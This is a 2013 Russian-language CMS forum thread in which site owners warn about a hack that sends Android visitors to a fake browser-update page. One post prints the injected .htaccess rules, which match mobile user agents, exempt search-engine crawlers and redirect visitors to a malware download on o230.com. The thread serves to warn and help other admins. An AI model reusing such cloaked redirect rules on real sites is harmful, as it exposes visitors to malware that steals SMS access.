Внимание! Нехорошая ссылка

1
2
Следующая
Показаны 1-15 из 18

#1 30 марта 2013 в 02:57

Здравствуйте уважаемые разработчики iCMS и все кто использует эту CMS. Обнаружил взлом, а так же вставлена ссылка

Спойлер

h..p://o230.com

которая проявляется только на андроиде. Просит-вынуждает обновить браузер, доступ к СМС и ММС и тд… Будте внимательны. Данный домен (домен зареган, пару недель назад) появился недавно -после установки некоторых модулей… Думаю стоит применить санкции.

#2 30 марта 2013 в 03:03

Просит-вынуждает обновить браузер, доступ к СМС и ММС и тд...
Tagil-Rulit

в такие моменты я рад, что у меня на планшете нету симок

правда без вайфая и инета нет cry

#3 30 марта 2013 в 03:04

-после установки некоторых модулей...

А конкретнее?

Сегодня в 22:20

#4 30 марта 2013 в 03:08

iCMS и все кто использует эту CMS.
Tagil-Rulit

Хотелось бы знать какая версия движка, какие модули ставили?..

#5 30 марта 2013 в 03:17

ссылка на статью, где описаны подобные случаи

Спойлер

h..p://habrahabr.ru/post/83062/

. Хостер тот же, что и в данном случае.

Хотелось бы знать какая версия движка, какие модули ставили?...
malanas

Ставил 3 платных модуля и один бесплатный-(мероприятия)

#6 30 марта 2013 в 04:42

ссылка на статью, где описаны подобные случаи
Tagil-Rulit

4 февраля 2010 в 09:37
shock

Tagil-Rulit, подобные случаи были, есть и будут!) причем та "древняя" статья к вашему случаю?
Или пароли сперли, или через дополнения возможно шаблон...

Больше кипаша чем толкового пояснения какая версия двига, что за шаб и какие дополнения… возможно просто пароли сперты)

#7 30 марта 2013 в 10:24

Вот зачем пугать то? Пока на статью не перешел аж изнервничался весь laugh

Компонент тизерной рекламы "AdClicks" доступен для скачивания

#8 30 марта 2013 в 13:45

Больше кипаша чем толкового пояснения какая версия двига, что за шаб и какие дополнения… возможно просто пароли сперты)
reload

Были случаи, когда секунды-минуты решали всё.
Ни кого не обвинял, лишь предупредил- и инфы по модулям не выкладывал специально-пока не проверил информацию. Написал лишь ссылку жуликов и статья на методы обмана в харбаре… Ищу где гадость прописалась. Данные по хосту мошенников можно взять через статистику.
Пароли в моём случае спереть хлопотно. Все понимаем, что увести могут всегда-тут вопрос только в — стоит ли овчина выделки… потраченное время и ресурсы на то, что бы спереть…
Ссылка на сайте вероятно в зашифрованном виде… перерыл файлы все… в БД пока не лез.

П.С. Возможно ломанули самого хостера…

#9 30 марта 2013 в 13:49

так и в чем же дело ?
есть ли у кого ссылки на онлайн эмулятор под андроид?

#10 30 марта 2013 в 14:15

Спойлер

AddDefaultCharset utf-8
Options -Indexes
 
RewriteEngine On
RewriteBase /
RewriteRule ^.htaccess$ - [F]
 
RewriteCond %{REQUEST_URI} !\.(ico|css|js|txt)$ [NC]
RewriteCond %{REQUEST_FILENAME} !^/admin
RewriteCond %{REQUEST_FILENAME} !^/migrate
RewriteCond %{REQUEST_FILENAME} !^/install
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
 
RewriteRule ^(.*)$ /index.php [L]
 
RewriteEngine   on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    h..p://o230.com/browser_update/1793/browser_update.auto    [L,R=302]

Взломали самого хостера, на сотнях сайтов была подмена файла .htaccess Выше под спойлером привёл код подмены. Хостер просил не разглашать инфу и своих данных…

#11 30 марта 2013 в 16:03

Так куда всем бежать?

Все не то, чем кажется и не наоборот...

#12 30 марта 2013 в 16:29

Так куда всем бежать?
йО ыХ Зу

Взломали самого хостера, на сотнях сайтов была подмена файла .htaccess Выше под спойлером привёл код подмены.
Tagil-Rulit

Стоит проверить, как отображается Ваш сайт с телефона, планшетника и тд… данный код заточен под разные ОСи, но чётко рабтал только на симбиан и андроиде.

#13 30 марта 2013 в 20:00

Стоит проверить, как отображается Ваш сайт с телефона, планшетника и тд…
Tagil-Rulit

я могу

у меня на планшете нету симок
nedoriko

мне это не страшно

Просит-вынуждает обновить браузер, доступ к СМС и ММС и тд
Tagil-Rulit

#14 30 марта 2013 в 22:50

У меня такое было. Хостинг не суперский, поэтому не боюсь назвать 1gb.ru. Не знаю насколько это связано с хостером. Нашел эту беду айболитом

Мой первый проект которым я занимаюсь больше месяца ))) http://in-army.com/

#15 31 марта 2013 в 18:28

nedoriko:
у меня на планшете нету симок
мне это не страшно
nedoriko

Посетителям Вашего сайта страшно… Для посетителей, виноваты (часто) всегда админы сайта… недосмотрели, не проконтролировали и тд.

1
2
Следующая
Показаны 1-15 из 18

Несколько фотографий в объявле

Опять размер миниатюр

Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.

Внимание! Нехорошая ссылка

Похожие темы

Видео по ссылке и импорт из вконтакте в instantvideo2

[ЕСТЬ РЕШЕНИЕ] Как убрать ссылку из профиля пользователя

Ссылки на категории и их влияние на продвижение сайта в регионах

[ЕСТЬ РЕШЕНИЕ] Вывод ссылки на скачивание файла в шаблоне дополнения

ссылка для приглашения

Ссылка "позвонить " в пункте меню

InstantCMS Team

О проекте

Поддержка

Дополнения